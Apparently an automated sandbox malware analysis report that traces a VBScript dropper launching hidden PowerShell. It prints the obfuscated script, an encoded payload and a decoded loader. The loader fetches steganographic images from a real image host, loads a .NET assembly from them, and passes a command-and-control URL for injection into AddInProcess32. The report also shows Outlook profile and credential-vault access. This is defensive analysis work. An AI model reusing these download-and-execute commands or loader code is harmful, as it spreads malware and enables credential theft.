Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

VBScript performs obfuscated calls to suspicious functions

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") pitheco = ("$(@(?(@?@?dig@?@? = '") & enterrar & "'" pitheco = pitheco & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" pitheco = pitheco & "[??}@*y??}@*" pitheco = pitheco & "t?*(?" pitheco = pitheco & "m.(@(?(@?@?" pitheco = pitheco & "nv?*(?r" pitheco = pitheco & "t]:" pitheco = pitheco & ":Fr@?@?" pitheco = pitheco & "mba??}@*" pitheco = pitheco & "?*(?64??}@*tring( $(@(?(" pitheco = pitheco & "@?@?d" pitheco = pitheco & "ig@?@?.r?*(?" pitheco = pitheco & "@%*:&la" pitheco = pitheco & "(@(?(?*(?('" pitheco = pitheco & "DgTr?*(?" pitheco = pitheco & "','" pitheco = pitheco & "A" pitheco = pitheco & "') ))" pitheco = pitheco & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" pitheco = Replace(pitheco,"@%*:&","p") pitheco = Replace(pitheco,"(@(?(","c") pitheco = Replace(pitheco,"?*(?","e") pitheco = Replace(pitheco,"@?@?","o") pitheco = Replace(pitheco,"??}@*","s") excursar1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " excursar1 = Replace(excursar1,"(@(?(","c") excursar1 = Replace(excursar1,"??}@*","s") excursar1 = Replace(excursar1,"@?@?","o") excursar1 = Replace(excursar1,"@%*:&","p") excursar = excursar1 & """" & pitheco & """" Cama.Run excursar, 0, False IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/gK5wA", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8Dg

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8100AD pushad ; iretd	1_2_00007FFD9B8100C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00E10610 push edx; retf 0000h	4_2_00E1061A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06258C87 push esp; iretd	4_2_06258C91

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
